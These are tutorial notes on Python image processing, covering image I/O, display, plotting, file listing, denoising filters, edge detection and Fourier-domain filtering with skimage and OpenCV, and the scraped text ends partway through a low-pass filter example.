      Tutorial 23 - Reading proprietary images in python

• Reading proprietary image files with Python
import tifffile

img = tifffile.imread('images/Osteosarcoma_01.tif')

from skimage import io

img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
• tif also comes in 3D image and time-series variants

        @@ -453,86 +451,86 @@

# Let us extract only relevant pixels, all channels in x and y
img1 = img[0, 0, :, :, :, 0]  # separate out height, width, channels

# Next, let us extract each channel image.
img2 = img1[0, :, :]  # first channel, Red
img3 = img1[1, :, :]  # second channel, Green
img4 = img1[2, :, :]  # third channel, Blue (DAPI)

        Tutorial 24 - Saving images from python to your local drive

        skimage

from skimage import io

img = io.imread('images/Osteosarcoma_01.tif')

from skimage import filters

gaussian_img = filters.gaussian(img, sigma=3)  # the image becomes float at this point

io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
        Lossy conversion from float64 to uint8. Range [0, 1]. Convert image to uint8 prior to saving to suppress this warning.
         
io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # cannot be opened: viewers do not recognize float-valued colors

from skimage import img_as_ubyte

gaussian_img_8bit = img_as_ubyte(gaussian_img)
io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit)  # this file opens fine

        OpenCV

import cv2

# OpenCV does not map floats to the 0-255 range; it truncates them, so the saved image looks black
cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
        True
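One workaround (a sketch, not from the tutorial; the output file name is made up) is to scale the [0, 1] float image to 0-255 and cast to uint8 before handing it to cv2.imwrite:

import numpy as np

# Map [0, 1] floats onto the 0-255 range before writing
img_uint8 = (np.clip(gaussian_img, 0, 1) * 255).astype(np.uint8)
cv2.imwrite('images/exported/saved_using_opencv_scaled.jpg', img_uint8)  # hypothetical file name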
         
# OpenCV assumes BGR channel order on output, so writing RGB data directly shifts the colors
cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
        True
         
# Convert the channels before writing
gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
        True
         

        matplotlib

from matplotlib import pyplot as plt

plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)

        tifffile

import tifffile

tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)

        png

        Tutorial 25 - Viewing 2d images in python

        matplotlib

from skimage import io

img = io.imread('images/Osteosarcoma_01.tif')

io.imshow(img)
        <matplotlib.image.AxesImage at 0x1d668f31a08>
         

        png

import matplotlib.pyplot as plt

plt.imshow(img)
        <matplotlib.image.AxesImage at 0x1d66951bbc8>
         

        png

cmap: display a grayscale image in a variety of styles:

        pyplot cmap 颜色 - 知乎 (zhihu.com)

        png

img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

plt.imshow(img_gray, cmap='hot')
        <matplotlib.image.AxesImage at 0x1d6698518c8>
         

        png

plt.imshow(img_gray, cmap='jet')
        <matplotlib.image.AxesImage at 0x1d6698c9948>
         

        png

plt.imshow(img_gray, cmap='Blues')
        <matplotlib.image.AxesImage at 0x1d66b5018c8>
         

        png

fig = plt.figure(figsize=(10, 10))

ax1 = fig.add_subplot(2, 2, 1)
ax1.imshow(img_gray, cmap='hot')
ax1.title.set_text('1st')

ax2 = fig.add_subplot(2, 2, 2)
ax2.imshow(img_gray, cmap='jet')
ax2.title.set_text('2nd')

ax3 = fig.add_subplot(2, 2, 3)
ax3.imshow(img_gray, cmap='gray')
ax3.title.set_text('3rd')

ax4 = fig.add_subplot(2, 2, 4)
ax4.imshow(img_gray, cmap='nipy_spectral')
ax4.title.set_text('4th')
plt.show()

        png

        OpenCV

import cv2

gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

# Use the function cv2.imshow() to display an image in a window.
# First argument is the window name (a string); second argument is our image.

cv2.imshow("pic from skimage import", img)  # Shows weird colors as R and B channels are swapped
cv2.imshow("color pic from opencv", color_img)
cv2.imshow("gray pic from opencv", gray_img)

# Keep the output windows open until the user presses a key
cv2.waitKey(0)

# Destroy all created windows
cv2.destroyAllWindows()

        png

        Tutorial 26 - Basic plotting in python using matplot.pyplot

A walkthrough of the matplotlib library

• Draw a line plot
from matplotlib import pyplot as plt

x = [1, 2, 3, 4, 5]
y = [1, 4, 9, 16, 25]

plt.plot(x, y)
        [<matplotlib.lines.Line2D at 0x22168454048>]
         

        png

import numpy as np

a = np.array(x)
b = np.array(y)
plt.plot(a, b)
        [<matplotlib.lines.Line2D at 0x22168e11148>]
         

        png

• Display an image
import cv2

gray_img = cv2.imread('images/sandstone.tif', 0)

plt.imshow(gray_img, cmap='gray')
        <matplotlib.image.AxesImage at 0x2216b0b5908>
         

        png

• Display a histogram
plt.hist(gray_img.flat, bins=100, range=(0, 150))
(array([  544.,    30.,    99.,    71.,   122.,    74.,   183.,    88.,
           274.,   170.,   394.,   253.,   594.,   341.,   806.,   507.,
          1145.,   626.,  1431.,   794.,  1808.,  1001.,  2091.,  1062.,
          ... (output truncated)

from matplotlib import pyplot as plt
import numpy as np

a = np.array([1, 2, 3, 4, 5])
b = np.array([1, 4, 9, 16, 25])

plt.plot(a, b, 'r--')
plt.axis([0, 6, 0, 50])
        (0.0, 6.0, 0.0, 50.0)
         

        png

• Several plot types
from matplotlib import pyplot as plt

wells = ['well1', 'well2', 'well3', 'well4', 'well5']
cells = [80, 62, 88, 110, 90]

plt.bar(wells, cells)      # bar chart
plt.scatter(wells, cells)  # scatter plot
plt.plot(wells, cells)     # line plot
        [<matplotlib.lines.Line2D at 0x2216c346dc8>]
         

        png

from matplotlib import pyplot as plt

# Adding labels and annotations
wells = [1, 2, 3, 4, 5]
cells = [80, 62, 88, 110, 90]

plt.figure(figsize=(8, 8))
plt.bar(wells, cells)
plt.xlabel('Well #', fontsize=18, color='red')
plt.ylabel('# dead cells')
plt.title('Dead cells in each well')
plt.axis([1, 6, 60, 120])  # xmin, xmax, ymin, ymax
plt.grid(True)  # show grid
plt.show()

        png

• Change the axis scale
from matplotlib import pyplot as plt

x = [1, 2, 3, 4, 5]
y = [10, 125, 1350, 11250, 100500]

plt.figure(figsize=(12, 6))

# linear
plt.subplot(121)
plt.plot(x, y)
plt.yscale('linear')
plt.title('linear')
plt.grid(True)

# log
plt.subplot(122)
plt.plot(x, y)
plt.yscale('log')
plt.title('log')
plt.grid(True)

        png

• Display multiple plots
from matplotlib import pyplot as plt

wells = ['well1', 'well2', 'well3', 'well4', 'well5']
cells = [80, 62, 88, 110, 90]


# Initialize the plot and subplots
fig = plt.figure(figsize=(16, 6))
ax1 = fig.add_subplot(131)
ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

ax2 = fig.add_subplot(132)
ax2.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

ax3 = fig.add_subplot(133)

# Plot the data
ax1.bar(wells, cells)
ax2.barh(wells, cells)
ax3.plot(wells, cells)

plt.savefig("images/my_plot.jpg")  # Save plot
# Show the plot
plt.show()

        png

        Tutorial 27 - Using glob to read multiple files in python

        Python 模块之 glob 模块 - 知乎


• Get the whole file list at once
import cv2
import glob

file_list = glob.glob('images/*.*')
file_list
['images\\Alloy_gradient.jpg',
 'images\\BSE.tif',
 'images\\bubbles.tif',
 ... (output truncated)

• Build the list with a for loop
my_list = []
path = 'images/*.*'
for file in glob.glob(path):
    print(file)
    a = cv2.imread(file)
    my_list.append(a)
images\Alloy_gradient.jpg
images\BSE.tif
images\bubbles.tif
... (output truncated)
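One caveat worth noting (a small defensive sketch, not from the video): cv2.imread returns None for anything it cannot decode, such as the exported subdirectory that shows up in this folder, so a guard keeps None out of the list:

import cv2
import glob

my_list = []
for file in glob.glob('images/*.*'):
    a = cv2.imread(file)
    if a is None:  # unreadable entry (e.g. a directory or unsupported format)
        continue
    my_list.append(a)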

• Use os.listdir

import os

path = 'images/'
print(os.listdir(path))

for image in os.listdir(path):
    print(image)
    ['Alloy_gradient.jpg', 'BSE.tif', 'bubbles.tif', 'cast_iron1.tif', 'cast_iron2.jpg', 'exported', 'monalisa.jpg', 'Osteosarcoma_01.tif', 'Osteosarcoma_01_1sigma_blur.tif', 'Osteosarcoma_01_25Sigma_noise.tif', 'Osteosarcoma_01_2sigma_blur.tif', 'Osteosarcoma_01_8bit.ome.tiff', 'Osteosarcoma_01_8bit_salt_pepper.tif', 'Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'Osteosarcoma_01_small.tif', 'Osteosarcoma_01_transl.tif', 'Osteosarcoma_01_transl_rot.tif', 'sandstone.tif', 'sandstone_blur_2sigma.tif', 'sandstone_low_contrast.tif', 'scratch_time_series.tif', 'synthetic.jpg', 'Ti_powder.tif', 'Ti_powder_single.tif']
     Alloy_gradient.jpg
     BSE.tif
... (output truncated)

• Use os.walk to traverse files

import os

print(os.walk('.'))  # Nothing to see here as this is just a generator

for root, dirs, files in os.walk('.'):
    # root: the directory currently being visited
    # dirs: list of subdirectory names in that directory
    # files: list of file names in that directory
    # iterate over the files
    for f in files:
        print(os.path.join(root, f))
    <generator object walk at 0x000001AAF06408C8>
     .\4.ipynb
     .\Untitled.ipynb
... (output truncated)

• Use os.walk to traverse directories

import os

print(os.walk('.'))  # Nothing to see here as this is just a generator

for root, dirs, files in os.walk('.'):
    # root: the directory currently being visited
    # dirs: list of subdirectory names in that directory
    # files: list of file names in that directory
    # iterate over the directories
    for d in dirs:
        print(os.path.join(root, d))
    <generator object walk at 0x000001AAF06406C8>
     .\.ipynb_checkpoints
     .\images

DIP - Introductory python tutorials for image processing (29-41) - Image Filtering

Rescaling

• resize serves the same purpose but lets you specify the output image shape instead of a scaling factor.
• downscale_local_mean downsamples an n-dimensional image by integer factors, using the local mean of each block of pixels whose size is passed as a function argument.
  14. -
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    -
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    -
    plt.imshow(img, cmap='gray')
    +
    1
    2
    3
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    +
    1
    2
    3
    4
    5
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    +
    1
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>
     

    png

plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>
     

    png

plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>
     

    png

img_downscaled = downscale_local_mean(img, (4, 3))  # unequal factors stretch the aspect ratio
plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>
     

    png

Gaussian blur

from skimage import io
from skimage.filters import gaussian, sobel

img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
plt.imshow(img)
gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
plt.imshow(gaussian_using_skimage)
    C:\Users\gzjzx\anaconda3\envs\wxpython37\lib\site-packages\skimage\_shared\utils.py:348: RuntimeWarning: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.
       return func(*args, **kwargs)
     

    gaussian

    png

Sobel edge detection

img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
sobel_img = sobel(img_gray)  # works only on 2D (gray) images
plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>
     

    png

OpenCV reads images in BGR channel order, so displaying them directly with matplotlib shifts the colors

import cv2
import matplotlib.pyplot as plt

img = cv2.imread('images/RGBY.jpg', 1)  # Color is BGR not RGB
plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>
     

    png
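The usual fix (a minimal sketch) is to convert to RGB before handing the array to matplotlib:

import cv2
import matplotlib.pyplot as plt

img_bgr = cv2.imread('images/RGBY.jpg', 1)
img_rgb = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)  # or img_bgr[:, :, ::-1]

plt.imshow(img_rgb)  # colors now display as expected
plt.show()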

Resizing

import cv2
import matplotlib.pyplot as plt

img = cv2.imread('images/RGBY.jpg', 1)
resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

cv2.imshow('original pic', img)
cv2.imshow('resized pic', resized)
cv2.waitKey(0)
cv2.destroyAllWindows()

    png

img.shape
    (400, 200, 3)
     
print('Top left', img[0, 0])
print('Top right', img[0, -1])
print('Bottom left', img[-1, 0])
print('Bottom right', img[-1, -1])
    Top left [254   0   0]
     Top right [  1 255 255]
     Bottom left [  1 255   0]
     Bottom right [ 42   0 255]
     

Splitting color channels

blue = img[:, :, 0]
green = img[:, :, 1]
red = img[:, :, 2]

blue, green, red = cv2.split(img)

cv2.imshow('red pic', red)
cv2.waitKey(0)
cv2.destroyAllWindows()

    png

Merging color channels

img_merged = cv2.merge((blue, green, red))

cv2.imshow('merged pic', img_merged)
cv2.waitKey(0)
cv2.destroyAllWindows()

    png

Canny edge detection

import cv2

img = cv2.imread('images/Osteosarcoma_01.tif', 0)
edges = cv2.Canny(img, 100, 200)

cv2.imshow('Original Image', img)
cv2.imshow('Canny', edges)
cv2.waitKey(0)
cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

$\text{sharpened image} = \text{original} + \text{amount} \times (\text{original} - \text{blurred})$

Principle

from skimage import io, img_as_float
from skimage.filters import unsharp_mask
from skimage.filters import gaussian

img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
img2 = (img - gaussian_img) * 2.
img3 = img + img2

from matplotlib import pyplot as plt

fig = plt.figure(figsize=(10, 10))

ax1 = fig.add_subplot(131)
ax1.imshow(img, cmap='gray')
ax1.title.set_text('1st')

ax2 = fig.add_subplot(132)
ax2.imshow(img2, cmap='gray')
ax2.title.set_text('img2')

ax3 = fig.add_subplot(133)
ax3.imshow(img3, cmap='gray')
ax3.title.set_text('img3')

plt.show()

    png

The unsharp_mask function

from skimage import io
from skimage.filters import unsharp_mask

img = io.imread("images/sandstone_blur_2sigma.tif")

# Radius defines the degree of blurring
# Amount defines the multiplication factor for (original - blurred)
unsharped_img = unsharp_mask(img, radius=3, amount=2)


import matplotlib.pyplot as plt
fig = plt.figure(figsize=(12, 12))
ax1 = fig.add_subplot(1, 2, 1)
ax1.imshow(img, cmap='gray')
ax1.title.set_text('Input Image')
ax2 = fig.add_subplot(1, 2, 2)
ax2.imshow(unsharped_img, cmap='gray')
ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction


      skimage.filters.gaussian

    png

import cv2
from skimage import io, img_as_float
from skimage.filters import gaussian

img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

img = img_gaussian_noise

gaussian_using_cv2 = cv2.GaussianBlur(img, (3, 3), 0, borderType=cv2.BORDER_CONSTANT)

gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
# sigma defines the std dev of the gaussian kernel. Slightly different from
# how we define it in cv2


cv2.imshow("Original", img)
cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
cv2.imshow("Using skimage", gaussian_using_skimage)
#cv2.imshow("Using scipy2", conv_using_scipy2)

cv2.waitKey(0)
cv2.destroyAllWindows()

    png

    Tutorial 33 - Image filtering in python - Median filter for denoising images


      OpenCV

import cv2
# Needs 8 bit, not float.
img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

img = img_gaussian_noise

median_using_cv2 = cv2.medianBlur(img, 3)

      skimage

from skimage.filters import median
from skimage.morphology import disk

"""
disk creates a circular structuring element,
similar to a mask with a specific radius
"""
disk(3)
array([[0, 0, 0, 1, 0, 0, 0],
        [0, 1, 1, 1, 1, 1, 0],
        [0, 1, 1, 1, 1, 1, 0],
        [1, 1, 1, 1, 1, 1, 1],
        [0, 1, 1, 1, 1, 1, 0],
        [0, 1, 1, 1, 1, 1, 0],
        [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)

cv2.imshow('Original', img)
cv2.imshow('cv2median', median_using_cv2)
cv2.imshow('Using skimage median', median_using_skimage)

cv2.waitKey(0)
cv2.destroyAllWindows()

      png
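Why the median filter kills salt-and-pepper noise can be seen on a toy array (a sketch, assuming the current skimage API): an isolated spike is replaced by the median of its neighborhood, which is 0.

import numpy as np
from skimage.filters import median
from skimage.morphology import disk

tiny = np.zeros((5, 5), dtype=np.uint8)
tiny[2, 2] = 255              # isolated bright "salt" pixel

print(median(tiny, disk(1)))  # the spike is gone: all zeros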

      Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

      双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

      OpenCV

import cv2

img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
img = img_gaussian_noise
bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

cv2.imshow("Original", img)
cv2.imshow("cv2 bilateral", bilateral_using_cv2)
cv2.waitKey(0)
cv2.destroyAllWindows()

      png

      Skimage

The video says it is slow… and it does seem quite slow

import cv2
from skimage.restoration import denoise_bilateral

img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
img = img_gaussian_noise
bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
                                            multichannel=False)
cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
cv2.waitKey(0)
cv2.destroyAllWindows()

      png

      Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

      NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

      png

      OpenCV

import cv2
import numpy as np
from skimage import io, img_as_float
from skimage.restoration import denoise_nl_means, estimate_sigma

img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
sigma_est = np.mean(estimate_sigma(img, multichannel=True))  # average the sigma estimated from all three channels
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\3289355486.py:7: FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma`. It will be removed in version 1.0. Please use `channel_axis` instead.
         sigma_est = np.mean(estimate_sigma(img, multichannel=True))
       
denoise_img = denoise_nl_means(img, h=1.15 * sigma_est,
                               fast_mode=True,
                               patch_size=5,
                               patch_distance=3,
                               multichannel=False)
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\4037562389.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means`. It will be removed in version 1.0. Please use `channel_axis` instead.
         denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
       
cv2.imshow("Original", img)
cv2.imshow("NLM Filtered", denoise_img)
cv2.waitKey(0)
cv2.destroyAllWindows()

      Skimage

from skimage import img_as_ubyte
import cv2

img_as_8btype = img_as_ubyte(img)
denoise_img_as_8byte = img_as_ubyte(denoise_img)

original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

cv2.imshow("Original", img)
cv2.imshow("NLM Filtered", denoise_img)
cv2.waitKey(0)
cv2.destroyAllWindows()

      png

      Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

      如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)
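In rough terms (notation here is mine, not the linked article's), TV denoising looks for an image $u$ that stays close to the noisy input $f$ while penalizing its total variation:

$\min_u \frac{1}{2}\lVert u - f \rVert_2^2 + w \sum \lvert \nabla u \rvert$

The weight argument of denoise_tv_chambolle plays the role of $w$: the larger it is, the smoother (and less faithful to the input) the result.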

import cv2
from skimage import io, img_as_float
from skimage.restoration import denoise_tv_chambolle

img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))

import matplotlib.pyplot as plt

plt.hist(img.flat, bins=100, range=(0, 1))
(array([3.26417e+05, 3.28804e+05, 2.18786e+05, 3.22133e+05, 2.09763e+05,
         3.05641e+05, 1.95677e+05, 2.78984e+05, 1.75691e+05, 2.45767e+05,
         2.25122e+05, 1.37699e+05, 1.89186e+05, 1.14683e+05, 1.55440e+05,
         ... (output truncated)

denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_8228\1044631449.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle`. It will be removed in version 1.0. Please use `channel_axis` instead.
         denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
       
cv2.imshow('Original', img)
cv2.imshow('TV Filtered', denoise_img)
cv2.waitKey(0)
cv2.destroyAllWindows()

      png

      Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

      BM3D 算法学习 - 知乎

      png

pip install bm3d
      Collecting bm3d
         Downloading bm3d-3.0.9-py3-none-any.whl (8.4 MB)
            ---------------------------------------- 8.4/8.4 MB 2.3 MB/s eta 0:00:00
... (output truncated)

from skimage import io, img_as_float
import bm3d
import cv2

noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
• The bm3d library is not well documented yet, but looking into the source code…

cv2.imshow("Original", noisy_img)
cv2.imshow("Denoised", BM3D_denoised_image)
cv2.waitKey(0)
cv2.destroyAllWindows()

          png

          Tutorial 38 - Image filtering in python - Edge detection

Edge detection filters


        png

import cv2

img = cv2.imread('images/sandstone.tif', 0)

        png

from skimage.filters import roberts, sobel, scharr, prewitt

roberts_img = roberts(img)
sobel_img = sobel(img)
scharr_img = scharr(img)
prewitt_img = prewitt(img)

cv2.imshow("Roberts", roberts_img)
cv2.imshow("Sobel", sobel_img)
cv2.imshow("Scharr", scharr_img)
cv2.imshow("Prewitt", prewitt_img)
cv2.waitKey(0)
cv2.destroyAllWindows()

        png

        Tutorial 39 - Image filtering in python - Edge detection using Canny


from skimage import io, filters, feature
import matplotlib.pyplot as plt
from skimage.color import rgb2gray
import cv2
import numpy as np


img = cv2.imread('images/sandstone.tif', 0)

# Canny
canny_edge = cv2.Canny(img, 50, 80)  # Supply thresholds 1 and 2

# Auto Canny
sigma = 0.3
median = np.median(img)

# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * median))
# Lower threshold is sigma % lower than the median
# If the value falls below 0, use 0

upper = int(min(255, (1.0 + sigma) * median))
# Upper threshold is sigma % higher than the median
# If the value exceeds 255, use 255

auto_canny = cv2.Canny(img, lower, upper)


cv2.imshow("Canny", canny_edge)
cv2.imshow("Auto Canny", auto_canny)
cv2.waitKey(0)
cv2.destroyAllWindows()

        png
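The median-based threshold logic above is handy to keep as a helper. A minimal sketch (the function name auto_canny is mine, not from the video):

import cv2
import numpy as np

def auto_canny(image, sigma=0.3):
    """Canny with thresholds derived from the image median."""
    med = np.median(image)
    lower = int(max(0, (1.0 - sigma) * med))    # sigma below the median, floored at 0
    upper = int(min(255, (1.0 + sigma) * med))  # sigma above the median, capped at 255
    return cv2.Canny(image, lower, upper)

# e.g. for a median of 100 and sigma = 0.3: lower = 70, upper = 130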

        Tutorial 40 - What is Fourier transform and how is it relevant for image processing

Fourier Transform


Code

• Create a sine wave
import cv2
import matplotlib.pyplot as plt
import numpy as np

# Generate a 2D sine wave image
x = np.arange(256)             # generate values from 0 to 255 (our image size)
y = np.sin(2 * np.pi * x / 3)  # calculate sine of x values
# Divide by a smaller number above to increase the frequency.
y += max(y)  # offset sine wave by the max value to go out of negative range of sine

# Generate a 256 * 256 image (2-D array of the sine wave)
img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

plt.imshow(img)
        <matplotlib.image.AxesImage at 0x246a404a700>
         

        png

# Change the frequency
# Generate a 2D sine wave image
x = np.arange(256)              # generate values from 0 to 255 (our image size)
y = np.sin(2 * np.pi * x / 30)  # calculate sine of x values
# Divide by a smaller number above to increase the frequency.
y += max(y)  # offset sine wave by the max value to go out of negative range of sine

# Generate a 256 * 256 image (2-D array of the sine wave)
img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

plt.imshow(img)
        <matplotlib.image.AxesImage at 0x246a542f1c0>
         

        png

        OpenCV

dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

# Shift DFT. First check the output without the shift.
# Without shifting, the data would be centered around the origin at the top left.
# Shifting it moves the origin to the center of the image.
dft_shift = np.fft.fftshift(dft)

# Calculate magnitude spectrum from the DFT (real part and imaginary part)
# Added 1 as we may see 0 values, and log of 0 is indeterminate
magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]) + 1)


# As the spatial frequency increases (bars get closer),
# the peaks in the DFT amplitude spectrum move farther away from the origin.

# The center represents low frequency and the corners high frequency (with DFT shift).
# To build a high pass filter, block the center corresponding to low frequencies and let
# high frequencies go through. This is nothing but an edge filter.

fig = plt.figure(figsize=(12, 12))
ax1 = fig.add_subplot(2, 2, 1)
ax1.imshow(img)
ax1.title.set_text('Input Image')
ax2 = fig.add_subplot(2, 2, 2)
ax2.imshow(magnitude_spectrum)
ax2.title.set_text('FFT of image')
plt.show()

        png
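The same spectrum can be cross-checked with NumPy alone (a sketch using the img loaded above; results should match the cv2.dft version up to floating-point differences):

import numpy as np

f = np.fft.fftshift(np.fft.fft2(np.float32(img)))
magnitude_np = 20 * np.log(np.abs(f) + 1)  # np.abs of a complex array is its magnitude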

In the magnitude spectrum on the right, for each point:

1) its distance from the center encodes the frequency;

2) the direction from the center to the point gives the direction of the plane wave;

3) the gray value at the point encodes its amplitude.

img = cv2.imread('images/sandstone.tif', 0)  # load an image
dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
dft_shift = np.fft.fftshift(dft)
magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]) + 1)

fig = plt.figure(figsize=(12, 12))
ax1 = fig.add_subplot(2, 2, 1)
ax1.imshow(img)
ax1.title.set_text('Input Image')
ax2 = fig.add_subplot(2, 2, 2)
ax2.imshow(magnitude_spectrum)
ax2.title.set_text('FFT of image')
plt.show()

        png

        Tutorial 41 - Image filtering using Fourier transform in python

import cv2
from matplotlib import pyplot as plt
import numpy as np

img = cv2.imread('images/sandstone.tif', 0)  # load an image
        • Output is a 2D complex array. 1st channel real and 2nd imaginary

dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
          • Rearranges a Fourier transform X by shifting the zero-frequency component to the center of the array.

dft_shift = np.fft.fftshift(dft)
• Magnitude of the spectrum is 20 * log(abs(f))

magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))
• Edge detection using the Fourier transform


rows, cols = img.shape
crow, ccol = int(rows / 2), int(cols / 2)

# Circular HPF mask: center circle is 0, remaining all ones
mask = np.ones((rows, cols, 2), np.uint8)
r = 80
center = [crow, ccol]
x, y = np.ogrid[:rows, :cols]
mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r * r
mask[mask_area] = 0
• Apply the mask and inverse DFT: multiply the Fourier-transformed image (values) with the mask values.

fshift = dft_shift * mask
                • Get the magnitude spectrum (only for plotting purposes)

fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                  C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\199016683.py:1: RuntimeWarning: divide by zero encountered in log
                     fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                   

f_ishift = np.fft.ifftshift(fshift)
                • Inverse DFT to convert back to image domain from the frequency domain.

img_back = cv2.idft(f_ishift)
                  • Magnitude spectrum of the image domain

img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
• Plot the results
fig = plt.figure(figsize=(12, 12))
ax1 = fig.add_subplot(2, 2, 1)
ax1.imshow(img, cmap='gray')
ax1.title.set_text('Input Image')
ax2 = fig.add_subplot(2, 2, 2)
ax2.imshow(magnitude_spectrum, cmap='gray')
ax2.title.set_text('FFT of image')
ax3 = fig.add_subplot(2, 2, 3)
ax3.imshow(fshift_mask_mag, cmap='gray')
ax3.title.set_text('FFT + Mask')
ax4 = fig.add_subplot(2, 2, 4)
ax4.imshow(img_back, cmap='gray')
ax4.title.set_text('After inverse FFT')
plt.show()

                    png

• Circular LPF mask: center circle is 1, remaining all zeros

                    rows, cols = img.shape
